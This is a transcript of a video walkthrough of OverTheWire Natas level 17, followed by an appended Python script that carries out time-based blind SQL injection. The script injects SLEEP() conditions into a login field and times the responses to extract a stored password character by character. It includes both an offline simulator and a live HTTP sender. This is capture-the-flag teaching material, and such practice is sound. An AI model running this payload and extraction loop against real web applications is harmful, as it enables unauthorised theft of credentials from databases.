What's up, everybody? Welcome back to the YouTube video. My name is John Hammond, and in this video we're looking at level 17 of the Natas war game from OverTheWire. So, on the tails of level 16, we just got the password for level 17. So let's run the script to check out what this web page is and what we're actually working with here. Here we have the form that we've seen before, just for logging in; it looks like we're given a username input field, and the button will check existence. So kind of the same SQL injection attack we've seen before, but maybe there's something different. So let's actually take a look at the source code and see what they're doing here. Just copy that link to the index source. And again, we'll have to de-entitize this, and we can remove all those break tags because we don't need those. Alright, so we have the same schema as we've seen before: just a users table with username and password. We have the same test in the PHP code for whether we actually POSTed to the page, and we run the same query. Looks like we have the same SQL injection attack vector, because they're just concatenating in the username, but it's commented out the output as to whether or not it got a result. So no longer can we determine a yes-or-no, binary dichotomy thing: does this user exist, does this user not exist? So we can't use that for our typical blind SQL attack. We won't be able to determine, via that yes or no, one or zero, whether we have the correct character in what we're trying to leak out. So we have to go through a different attack, and this will be pretty neat. This is, I think, one of the coolest things that you can do with SQL. But let's go ahead and start to POST to this web page and see what we can do. We want to change our method to POST, same URL; data will be username, that's the variable that we've got to work with in HTTP, and we'll say "subscribe" blah blah blah. POST, run this. No output, just like it told us, but we know we have our SQL injection.
So if I were to change these two single quotes to the original quote, the double quote that they're using in that SQL statement, we can OR 1=1 and throw a comment in there. Run this and, looks like, again no real output, but we can do some other interesting things. Because we have that SQL injection, we can run SQL commands and SQL functions and do SQL things. Let's actually try and sleep for a certain amount of time. So this function will do exactly as it says: it will wait or sleep a certain number of seconds that we pass in here as a number, and it will actually operate because we're using that AND function. So if something returns and we get this SLEEP function, which will return one if it succeeds, or it'll return successful, but the AND will mean it will execute if the user that we're checking for, according to the application code, exists. So let's try this. If I hit Ctrl+B to run it, it returns immediately because obviously the user "subscribe" does not exist. But if I change this to natas18 (natas18 is the next password that we want) and I hit the go button here, the build output, there's no response for at least five seconds because we've hit that SLEEP function. So this gives us the building blocks for a timing attack, for time-based SQL injection, because we can actually leak out the password, right? We can say WHERE password... we actually don't want to use the WHERE clause, because it's already being used for that WHERE username. So we can just say AND password LIKE and use the same methodology that we've been using before. So add in what we've seen of the seen password, join of seen_password, because we'll keep track of that in a list, and a character that we iterate through. Don't forget our percent sign here so we get the wildcard, and let's change the SLEEP to two. So let's get that character pool that we want to work with.
So let's say characters can equal... let's get everything from the string module so we can use lowercase, uppercase and digits as we've seen before. Sorry for this duplicate code here, guys, but now we'll do a while loop, or actually we'll do a seen_password again to determine the length: length of seen_password is less than 32, because we know that was the length for it. We'll say for character in characters, try and get this response here, and let's actually just print "trying" and let's get what we're looking for. We don't need the plus there. We don't have to print that out, but I'm going to do this in the command line. Let's change that preference so it looks... Let's run that python natas17 script, and I forgot my colon, my bad. Okay, so now we're going to start to iterate, trying all these characters, but at X we hang a little bit, and we've got to test if we actually got a hit, if it slept for two seconds, or if there is a real difference in the time between one execution and the next. Then we know we've got the correct character, because that AND password LIKE successfully executed, and then SLEEP will successfully execute. So let's change this, and let's start to get a time to determine how long this code takes to run. Let's import time. Let's actually do from time import * so we can just use the time function real easy. So for every character we're looking at, we're going to try and send it, and then we'll determine what the time currently is, start_time. We can just do that for debugging purposes, and then we can say end_time can be the new time after we've already made that request, and let's say the difference can equal end_time minus start_time. So we can get an idea of how long that took: difference. Now we can print these things out, and while we're watching it, difference is maybe two-tenths of a second, but I'll scroll up here. Once we got to X, we could tell the difference took more than a second, because we slept for that second there.
You might have different values on this depending on how your internet connection is, because we're literally timing how long this request takes, and that sleep function, whatever integer amount of seconds you pass into the SLEEP function in SQL, obviously that will vary. So if I were to run this with two, you'll see a different difference, because now you're sleeping for two seconds. But since you're going to automate this and weaponize it to actually leak out the password, you want to do something that will give you relatively quick speed but still let you be able to determine what the threshold is for this actually being a successful hit. So we can say if the difference is greater than one, then we know we actually have a successful hit: that's the correct character that we've seen in that position of the password. So let's add that to our seen_password and break out of this for loop so we can keep moving: seen_password.append the character we're looking at in the loop, and then let's break. Cool. We don't need this start_time notice anymore. Now let's start to loop. What did I do wrong? I think that was happening because nothing was buffering this output here. Now let's try this. We actually have that print statement that will tell us the "trying", and it will determine that X is the correct password. Okay, cool. So now we have an attack; looks like we're leaking out the password, but we forgot the BINARY notion in the password here, so we may be missing capital letters. Let's make sure we include AND BINARY password LIKE so we get case sensitivity when we leak out that field in the database. Now we can let the script run, and by the end of it we'll have the password for natas18. All right, I'll let this run and I'll see you in a little bit. So it looks like the script did finish and we have a potential password. Let's head back to the original script and save it as a new one, natas18.
Paste the password in here, change the username, and let's see if we can just get that page, see if we got the correct password, and we're ready to move on. Let's Ctrl+B, run this, and here we are: Natas level 18. Sweet. So we did it. That was the successful loop and pretty much a good Python attack for actually implementing a timing-based SQL injection exploit, if you want to call it that. And I think that's super cool; sqlmap does some stuff with that, and if you haven't seen that tool, totally check it out. But I like to consider that methodology pretty good for a timing attack, and you'll see those in a lot of capture-the-flag competitions. And when you don't have explicit SQL injection and you can't get results easily to determine your blind SQL injection, you can still leak out pieces of the database just by taking a little bit of time, using a loop like this. And you can just run with a while True if you don't have this criteria about what you're leaking out, about its length or whatever. You can just run forever, and once your loop starts to act weird and gives you, like, random bytes, you know, okay, I've pretty much reached the end. So that's it. That's how we can do a timing attack and time-based SQL injection in Python and some web hacking. Thank you guys so much for watching. If you do like the video, please click that like button. Please let me know what else you're thinking, what else you'd like to see, what else I could do better with, in a comment. If you're willing to subscribe, thank you so much. See you in another video.
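The time-based extraction walked through in the video, as an added Python example that is not John Hammond's script and not part of the transcript. It builds the same injected `username` value (close the double quote, then `AND BINARY password LIKE "<seen><c>%" AND SLEEP(n) #`), times each request, and treats a delay longer than half the `SLEEP` value as a hit, which is the threshold choice the video arrives at for `SLEEP(2)` and `difference > 1`. It goes slightly beyond the video in one respect: when no candidate character causes a delay, it stops, which covers the "run with `while True` until it acts weird" case without guessing. `FakeNatas17` is a constructed stand-in for the vulnerable PHP so the script runs offline (it honours only this payload shape, it does not run MySQL), and the 32-character password inside it is made up. The level URL and basic-auth credentials in `make_http_sender` are assumed placeholders, not values from the video.

```python
import base64
import re
import string
import time
import urllib.parse
import urllib.request

CHARSET = string.ascii_letters + string.digits   # same pool as the video: a-z, A-Z, 0-9
SLEEP_SECONDS = 2                                  # what the injected SLEEP() asks for
PASSWORD_LENGTH = 32                               # natas passwords are 32 characters
DEMO_PASSWORD = "aB3cD4eF5gH6iJ7kL8mN9oP0qR1sT2uV"  # constructed, not a real natas password


def build_payload(target_user, known_prefix, candidate, sleep_seconds=SLEEP_SECONDS):
    """Value for the `username` POST field.

    The level's query is  SELECT * from users where username="<input>"  so the
    payload closes the string, appends a condition that is only true when the
    password starts with known_prefix + candidate, and comments out the rest.
    BINARY makes LIKE case-sensitive; '%' is the wildcard.  AND short-circuits,
    so SLEEP() runs (and the response is delayed) only on a matching prefix.
    """
    return (f'{target_user}" AND BINARY password LIKE "{known_prefix}{candidate}%" '
            f'AND SLEEP({sleep_seconds}) #')


def extract_password(send, target_user, sleep_seconds=SLEEP_SECONDS,
                     max_length=PASSWORD_LENGTH, charset=CHARSET):
    """Leak target_user's password one character at a time by timing `send`."""
    threshold = sleep_seconds / 2   # well above network jitter, well below a real SLEEP
    seen = ""
    while len(seen) < max_length:
        for c in charset:
            start = time.monotonic()           # monotonic: immune to wall-clock jumps
            send(build_payload(target_user, seen, c, sleep_seconds))
            elapsed = time.monotonic() - start
            if elapsed > threshold:
                seen += c                      # this position is confirmed, move on
                break
        else:
            # No candidate delayed the response: either the password is shorter than
            # max_length or it contains a character outside `charset`.  Stop here.
            break
    return seen


class FakeNatas17:
    """Constructed stand-in for the vulnerable page, for running this offline.

    It recognises only the payload produced by build_payload and reproduces the
    effect of `AND ... AND SLEEP(n)`: sleep n seconds iff the user exists and the
    password starts with the probed prefix (case-sensitively, like BINARY).
    """
    _payload = re.compile(r'^(.*?)" AND BINARY password LIKE "(.*)%" AND SLEEP\(([\d.]+)\) #$')

    def __init__(self, users):
        self.users = users          # {username: password}
        self.requests = 0

    def send(self, username_value):
        self.requests += 1
        m = self._payload.match(username_value)
        if not m:
            return                  # page prints nothing either way, as in the video
        user, prefix, secs = m.group(1), m.group(2), float(m.group(3))
        pw = self.users.get(user)
        if pw is not None and pw.startswith(prefix):
            time.sleep(secs)


def make_http_sender(url, basic_user, basic_pass):
    """Real sender for the live level: POST username=<payload> behind HTTP basic auth.

    Assumed usage, not exercised here:
        send = make_http_sender("http://natas17.natas.labs.overthewire.org/",
                                "natas17", "<natas17 password>")
    """
    token = base64.b64encode(f"{basic_user}:{basic_pass}".encode()).decode()

    def send(username_value):
        data = urllib.parse.urlencode({"username": username_value}).encode()
        req = urllib.request.Request(url, data=data,
                                     headers={"Authorization": "Basic " + token})
        with urllib.request.urlopen(req) as resp:
            resp.read()             # body is irrelevant; only the elapsed time matters
    return send


if __name__ == "__main__":
    fake = FakeNatas17({"natas18": DEMO_PASSWORD})
    leaked = extract_password(fake.send, "natas18", sleep_seconds=0.1)
    print(f"leaked {leaked!r} in {fake.requests} requests")
```

Against the fake, the short `SLEEP(0.1)` keeps the demo to a few seconds; against the live level use a value comfortably above your round-trip jitter (the video settles on 2 seconds with a 1-second threshold), because one false hit from a slow link corrupts every later position.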